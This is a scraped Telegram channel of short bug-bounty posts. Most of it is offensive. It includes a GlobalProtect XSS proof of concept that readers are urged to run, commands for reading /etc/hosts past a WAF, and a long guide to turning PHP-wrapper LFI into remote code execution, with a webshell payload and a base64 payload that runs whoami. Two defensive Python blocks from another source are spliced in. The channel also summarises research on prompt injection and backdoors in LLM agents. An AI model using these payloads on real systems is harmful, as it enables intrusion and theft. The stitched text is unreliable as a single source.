bugbounty_tech | Unsorted

Telegram channel bugbounty_tech - Bug bounty Tips

2777

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r


Bug bounty Tips

Windows lateral movement quick reference

#ThreatHunting #DFIR


Bug bounty Tips

People are happy just because OpenAI released their new and most intelligent chat model, GPT-5.

But as cybersecurity experts, do you think this is the future or a threat?

I have posted a thread on this, please do check it out.

https://x.com/Cipher0ps_tech/status/1953701559545868545


Bug bounty Tips

#Research
#MLSecOps
"Security study based on the ChatGPT plugin system: Identifying Security Vulnerabilities", 2024.

// The aim of this paper is to explore the security of plugins in the CHATGPT plugin store, reveal the main security vulnerabilities that exist, and suggest improvements


Bug bounty Tips

⭐️PACU - The AWS exploitation framework, designed for testing the security of Amazon Web Services environments.

https://github.com/RhinoSecurityLabs/pacu


Bug bounty Tips

Hey everyone,

I just open-sourced a project I've been working on called PITT.

It's a CLI tool to help developers and security folks test their LLM applications against the OWASP LLM Top 10.
It uses a configurable "Judge LLM" to make the vulnerability detection much more accurate than simple keyword matching.

Would love for you to check it out and hear what you think!

GitHub Link: https://github.com/Addy-shetty/Pitt.git


Bug bounty Tips

Bug Bounty Tip: HTTP Parameter Pollution (HPP)

Some apps mishandle duplicate parameters. You can bypass logic or elevate privileges by injecting multiple values:

GET /transfer?amount=100&admin=true&amount=1

⚠️ Always test:
• param=value1&param=value2
• Encoded (%26,)

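Added example (not part of the original post): a server-side view of the duplicate-parameter problem from the tip above. It shows how a "first wins" and a "last wins" component disagree on the post's sample query, and a strict parser that refuses such input. The function names, the rejection policy and the second sample query are assumptions made for illustration.

```python
from urllib.parse import parse_qsl, unquote

# Query from the post, plus two constructed samples.
POLLUTED = "amount=100&admin=true&amount=1"
ENCODED = "to=bob%26amount%3D1"   # constructed: '&' smuggled inside a value as %26
CLEAN = "amount=100&to=bob"       # constructed

class AmbiguousQuery(ValueError):
    """Raised when two parsers could read the same query differently."""

def resolve(query, policy):
    """Model how a component picks a value when a key repeats ('first' or 'last')."""
    out = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if policy == "last" or key not in out:
            out[key] = value
    return out

def parse_strict(query):
    """Parse a query string, refusing anything open to parameter pollution."""
    seen = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key in seen:
            raise AmbiguousQuery(f"duplicate parameter: {key!r}")
        # A decoded '&' inside a value turns into extra parameters if any
        # downstream component rebuilds and re-parses the query string.
        # Assumption: no legitimate value on this endpoint contains '&'.
        if "&" in unquote(value):
            raise AmbiguousQuery(f"embedded delimiter in {key!r}")
        seen[key] = value
    return seen

def verdict(query):
    """Return 'ok' or the reason the query was refused."""
    try:
        parse_strict(query)
        return "ok"
    except AmbiguousQuery as exc:
        return str(exc)

if __name__ == "__main__":
    # A validator that reads the first value and a backend that reads the last disagree.
    print(resolve(POLLUTED, "first")["amount"], resolve(POLLUTED, "last")["amount"])
    for q in (POLLUTED, ENCODED, CLEAN):
        print(q, "->", verdict(q))
```

Rejecting the request outright is safer than picking one value, because the validator and the backend then never see different amounts.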

Bug bounty Tips

#exploit

1⃣ CVE-2025-4660:
Windows Forescout SecureConnector RCE
2⃣ CVE-2025-48384:
Breaking git with a carriage return and cloning RCE
3⃣ CVE-2025-32023:
RCE in Redis >= 2.8
4⃣ CVE-2023-4272:
Cache Coherence Vulnerability in the Mali GPU Driver
5⃣ The Journey of Bypassing Ubuntu’s Unprivileged Namespace Restriction
6⃣ CVE-2025-6759:
LPE in Citrix Virtual Apps and Desktops
]-> Tool to test/mitigation
7⃣ CVE-2024-7401:
Improper Authentication in Netskope Client
8⃣  RCE Vulnerability in ETQ Reliance

// Disclaimer


Bug bounty Tips

The recently disclosed XSS vulnerability in GlobalProtect (CVE-2025-0133) has affected hundreds of thousands of organizations worldwide — including thousands of bug bounty programs.
Try your luck by running this PoC


/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=<svg xmlns%3D"http%3A%2F%http://2Fwww.w3.org%2F2000%2Fsvg"><script>prompt("XSS")<%2Fscript><%2Fsvg>&domain=(empty_domain)&computer=computer


Bug bounty Tips

⚡CloakQuest3r - Uncover the true IP address of websites safeguarded by Cloudflare & Others

https://github.com/spyboy-productions/CloakQuest3r


Bug bounty Tips

Guys, after a long time I created a web app to play a sudoku game.

Check out the repo and let me know.

https://github.com/Addy-shetty/Suduko_to_play


Bug bounty Tips

HTB- ALL modules

Run:

python -m http.server 8000


to view clear html pages in localhost:8000


Bug bounty Tips

https://www.bugbountyhunting.com/


Bug bounty Tips

https://github.com/sanjai-AK47/ShodanX


Bug bounty Tips

🚀 Exciting News for #InfoSec & #BugBounty! 🛡

ProxSec v1.0.0 is out—an open-source extension for security pros! 🔥

✅ Proxy management
✅ Scope validation
✅ Program tracking
✅ Lightweight & private

Open-Source : https://github.com/aacle/ProxSec

Feedback welcome! 💬


Bug bounty Tips

https://pocorexp.nsa.im
lists all CVEs and public exploits


Bug bounty Tips

⚡Bypass Series for bug hunters😎

Part-2
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF

xxd -p /etc/hosts | xxd -p -r
xargs -d '\n' -I{} echo {} < /etc/hosts
perl -pe '' /etc/hosts
sed '' /etc/hosts
awk '{print}' /etc/hosts
dd if=/etc/hosts 2>/dev/null

#Bugbountytips #infosec


Bug bounty Tips

Guys, check this out: my Obsidian notes are now online. Let me know how they are; happy to listen to your feedback.

https://obsius.site/1o2o0n6w0j0q4u48454m


Bug bounty Tips

⚡️SSRFUtility - SSRF Exploitation Tool
🔗 https://ssrf.cvssadvisor.com/


Bug bounty Tips

#Analytics
#MLSecOps
#Threat_Research
"AI Threat Landscape Report", 2025.

See also:
]-> 2025 GenAI Code Security Report (.pdf)
]-> LLM and Gen AI Data Security Best Practices


Bug bounty Tips

#tools
#MLSecOps
#Offensive_security
Security Solutions for AI Systems 
1⃣ Confidential Computing
1.1 Sentient Enclaves Framework
1.2 SyMPC - SMPC companion library for Syft
1.3 Confidential Computing API
2⃣ Encryption and Data Protection
2.1 IronCoreLabs Transform encryption lib for Scala
2.2 Diffprivlib - IBM Differential Privacy Library
2.3 TenSEAL - Library for doing homomorphic encryption operations on tensors
2.4 PyDP - Python Differential Privacy Library
3⃣ Governance
3.1 VerifyWise - Open source AI governance platform
3.2 Cartai - OSS AI supervisor Agent
4⃣ Model Testing
4.1 Plexiglass - tool to detect/protect LLM vulns
4.2 Giskard-AI - Evaluation/testing for LLM systems
4.3 ModelScan - ML Model Security Scanner
4.4 LlamaFirewall, PurpleLlama - Tools for LLM security
4.5 Garak - LLM vulnerability scanner
4.6 Package for LLM jailbreak evaluation
5⃣ Prompt Firewall and Redaction
5.1 Guardrails AI - Adding guardrails to LLMs
5.2 Private AI - Detect, anonymize, and replace PII
5.3 Lakera Guard - ChatGPT Data Leak Protection
5.4 Rebuff - LLM Prompt Injection Detector
5.5 Trylon Gateway - Open Source Firewall for LLMs
5.6 LLM Guard, Vigil - Security scanner for LLM prompts
5.7 MCP-Scan - Security scanner tool for MCP servers
5.8 Vibranium Dome - LLM WAF for Agents
6⃣ AI Quality Controls and Testing
6.1 GenAI Prompt Fuzzer
6.2 FuzzyAI, LLMFuzzer Frameworks
6.3 Test Generation for Prompts
6.4 Promptfoo: LLM Evals & Red Teaming
7⃣ Training Data Protection
7.1 Trusted-AI - Adversarial Robustness Toolbox
7.2 datasig - Dataset fingerprinting for AIBOM
8⃣ AI for Offensive Cyber
8.1 Vulnhuntr - AI-Discovered 0-day Tool
8.2 Confident AI - LLM Red Teaming Framework
8.3 Agentic LLM Vulnerability Scanner / AI RedTeam Kit
8.4 llm-attacks - Attacks on Aligned LLMs
8.5 HackGPT - Tool using ChatGPT for hacking
8.6 AI/ML Exploits, CAI CTF Framework


Bug bounty Tips

#Research
#MLSecOps
"From Prompt Injections to Protocol Exploits: Threats in LLM-Powered AI Agents Workflows", 2025.

// In this Research, we introduce the first unified, end-to-end threat model for LLM-agent ecosystems, spanning host-to-tool and agent-to-agent communications, formalize adversary capabilities and attacker objectives, and catalog over thirty attack techniques. We organized the threat model into four domains: Input Manipulation (prompt injections, long-context hijacks, multimodal adversarial inputs), Model Compromise (prompt- and parameter-level backdoors, composite and encrypted multi-backdoors, poisoning strategies), System and Privacy Attacks (speculative side-channels, membership inference, retrieval poisoning, social-engineering simulations), and Protocol Vulnerabilities (exploits in Model Context Protocol, Agent Communication Protocol, Agent Network Protocol, Agent-to-Agent protocol)


Bug bounty Tips

https://www.notion.so/AD-aboud-1dcabf92dc0f805fb5e6fbb1917ff1f7?source=copy_link


Bug bounty Tips

🚨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.

https://github.com/ill-deed/CVE-2025-34085-Multi-target


Bug bounty Tips

Penetration Testing with KALI and More: All You Need to Know, full guide

Duration: 7 hours


Bug bounty Tips

https://beerus11.medium.com/redis-internals-and-use-cases-the-definitive-guide-4bab3b7faf11


Bug bounty Tips

This is my suggestion for whoever needs to start in cybersecurity: a 6-month plan


Bug bounty Tips

https://github.com/kh4sh3i/Application-Security-Interview-Questions


Bug bounty Tips

Spotlight on taiphung217: Five-Month Climb to Huntr Leaderboard Glory

https://blog.huntr.com/spotlight-taiphung217-five-month-huntr-leaderboard-climb


Bug bounty Tips

Guys, this is a regularly updated blog of cipherops. If you need anything, you can go and check here. If possible, I would like to update it twice a week.

https://cipherops.gitbook.io/bug-bounty-notes


Bug bounty Tips

🔥 Mastering PHP Filters & Wrappers for LFI to RCE — FULL GUIDE

⚠️Most hackers stop at reading logs.
The elite use PHP wrappers to turn LFI into remote code execution.
This post is your all-in-one breakdown of how PHP wrappers work and how to exploit them like a pro. 👇

🎯 Why PHP Wrappers Matter in Bug Bounty

PHP provides built-in stream wrappers — special protocols to access I/O sources like files, memory, input/output streams, and even compressed/encrypted data.


As attackers, we can abuse these wrappers to:
✅ Read raw PHP source (even when .php is auto-appended)
✅ Bypass execution to leak secrets
✅ Chain into full RCE
✅ Abuse legacy or misconfigured server behavior

Commonly used wrappers:
▶️ php://filter
▶️ php://input
▶️ php://memory
▶️ data://
▶️ expect://
▶️ zip://
▶️ phar://

🧬 Using php://filter for Source Code Disclosure
This is the most useful wrapper for LFI.

Payload:
php://filter/read=convert.base64-encode/resource=index


Why it works:
✅ read=convert.base64-encode prevents execution of the PHP code
✅ Base64 output = raw, readable source

Example:
http://<IP>/index.php?file=php://filter/read=convert.base64-encode/resource=config

Decode result:
echo 'PD9waHAK...base64...' | base64 -d

Now you see source code, credentials, internal logic, API keys, etc.

🔧 Other Useful PHP Wrappers

1️⃣ php://input

Reads raw POST data.
Good for injecting code during file inclusions via POST.
<?php include('php://input'); ?>

Then POST:
POST /index.php
<?php system($_GET['cmd']); ?>

✅ Shell access via cmd parameter.

2️⃣ expect:// (if available)

Allows direct execution of system commands.
include('expect://ls');

⚠️ Rare but deadly if enabled.

3️⃣ data://

Inline file input using base64 or plaintext.

Example:
include('data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==');

🟡 Executes: system('whoami')

4️⃣ zip://

✅ Targets ZIP files as file systems.
✅ Abuse via LFI to include malicious entries.

Structure:
zip://path/to/archive.zip#file_inside.txt

Use this with file upload + LFI combo.

5️⃣ phar://

Deserializes metadata → use with Object Injection + LFI.

Upload malicious PHAR:
phar://path/to/phar_file

If unserialize() is called on a phar wrapper, it can lead to RCE.


🔍 Fuzzing PHP Files Before Exploiting
ffuf -w /opt/seclists/.../directory-list.txt -u http://<IP>/FUZZ.php


Watch for:

200 → exists and renders
403/302 → access denied, but still includable via LFI


📁 Standard Inclusion vs. Filtered Inclusion

Including via:
?file=config

🟡 Executes file, no output if file has no HTML.

Using filter:
?file=php://filter/read=convert.base64-encode/resource=config

🟡 Returns base64 source code.


🧪 Decode & Analyze the Source Code
echo 'base64-encoded-content' | base64 -d


Look for:
✅ $db_password, $admin_pass
✅ API endpoints
✅ Sensitive routes
✅ Hardcoded JWT secrets or keys


💣 Advanced Chaining → From LFI to RCE

1. Read source via php://filter
2. Find upload paths or SSRF endpoints
3. Upload malicious phar:// file
4. Trigger inclusion → RCE

This chain has been used in real-world bounty reports.

🧱 Defense Tips for Developers:
- Disable allow_url_include, allow_url_fopen
- Avoid dynamic include($_GET['page'])
- Use strict whitelists
- Harden php.ini configs
- Monitor suspicious access patterns



🔗 Github link : github.com/cybersecplayground...

#lfi #phpwrappers #bugbounty #phpfilters #rce #infosec #cybersecurity #webpentest #cybersecplayground

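Added example (not part of the original post): one way to act on the "Monitor suspicious access patterns" tip above, by flagging access-log requests whose query parameters name one of the stream wrappers the post lists, including percent-encoded and double-encoded forms. The log lines are constructed samples in combined log format, and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Wrapper schemes named in the post above.
WRAPPERS = ("php", "data", "expect", "zip", "phar")
WRAPPER_RE = re.compile(r"\b(%s)://" % "|".join(WRAPPERS), re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, invented timestamps).
LINES = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /index.php?file=about HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2025:10:00:05 +0000] "GET /index.php?file=php://filter/'
    'read=convert.base64-encode/resource=config HTTP/1.1" 200 2048',
    '192.0.2.44 - - [01/Jan/2025:10:00:09 +0000] "GET /index.php?lang=en&'
    'file=%2570har%253A%252F%252Fuploads/a.jpg HTTP/1.1" 200 0',
]

def fully_decode(value, rounds=3):
    """Undo up to `rounds` extra layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_wrapper_use(log_line):
    """Return [(param, wrapper)] for query parameters whose value names a stream wrapper."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    hits = []
    query = urlsplit(match.group(1)).query
    for key, value in parse_qsl(query, keep_blank_values=True):
        found = WRAPPER_RE.search(fully_decode(value))
        if found:
            hits.append((key, found.group(1).lower()))
    return hits

def scan(lines):
    """Return [(line_number, hits)] for every line that references a wrapper."""
    return [(n, h) for n, h in ((i, find_wrapper_use(l)) for i, l in enumerate(lines, 1)) if h]

if __name__ == "__main__":
    for number, hits in scan(LINES):
        print(f"line {number}: {hits}")
```

Access logs record only the request line, so content sent in a POST body (the php://input case) is not visible here and needs request-body inspection at the application or proxy layer.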